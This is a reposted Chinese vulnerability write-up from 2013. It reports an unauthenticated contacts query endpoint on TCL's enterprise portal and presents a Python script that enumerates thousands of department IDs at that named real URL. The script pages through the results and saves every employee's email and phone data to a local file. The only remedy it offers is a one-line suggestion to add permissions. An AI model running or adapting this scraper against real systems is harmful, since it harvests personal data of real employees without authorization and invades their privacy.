我是如何获得TCL全部员工邮箱与电话的(附验证脚本) -电脑资料

时间:2013-06-07 02:23:41
染雾
分享
WORD下载 PDF下载 投诉

一个系统查询接口存在未授权访问~

<code>#!/usr/bin/env python# coding: utf-8 # pip install requests requests_ntlmimport requestsimport reimport sysimport timefrom requests_ntlm import HttpNtlmAuthreload(sys)sys.setdefaultencoding('utf-8')PAGE_REGEX = re.compile(r'PageCount":.*(\d),')def main(start_num, end_num):    delay = 3    delay_count = 100    i = 0    with open('tcl_account.txt','a') as f:        for id in xrange(start_num, end_num):            i += 1            _url = "http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=000%s" % id            json, pagecount = get(_url)            print _url            f.write('%s\n%s\n' % (_url,json))            if pagecount > 1:                print '[*] fo

und page size: %s' % pagecount for pageindex in range(2, pagecount+1): page_url = _url.replace('pageIndex=1', 'pageIndex=%s' % pageindex) print '[%s]' % pageindex, page_url _json, _ = get(page_url) f.write('%s\n%s\n' % (page_url, _json)) if i % delay_count == 0: time.sleep(delay) print '[-] delay %s(s)' % delay def get(url): url = "%s&t=%s" % (url, time.time()) result = '' pagecount = 1 auth_nt = HttpNtlmAuth('user', '***') #req = requests.get(url=url, auth=auth_nt) req = requests.get(url=url, timeout=15) if req.status_code == 200: result = req.text match = PAGE_REGEX.search(result) if match: pagecount = int(match.group(1)) return (result, pagecount)if __name__ == '__main__': main(84599, 87715)</code>

支持分页抓取

http://ep.tclcom.com/_layouts/TCL.EP.GPortal.UI/ashx/ContactsHander.ashx?method=query&maxItemCount=11&pageIndex=1&parentId=00085221

解决方案:

添加权限~

我是如何获得TCL全部员工邮箱与电话的(附验证脚本) -电脑资料

手机扫码分享

Top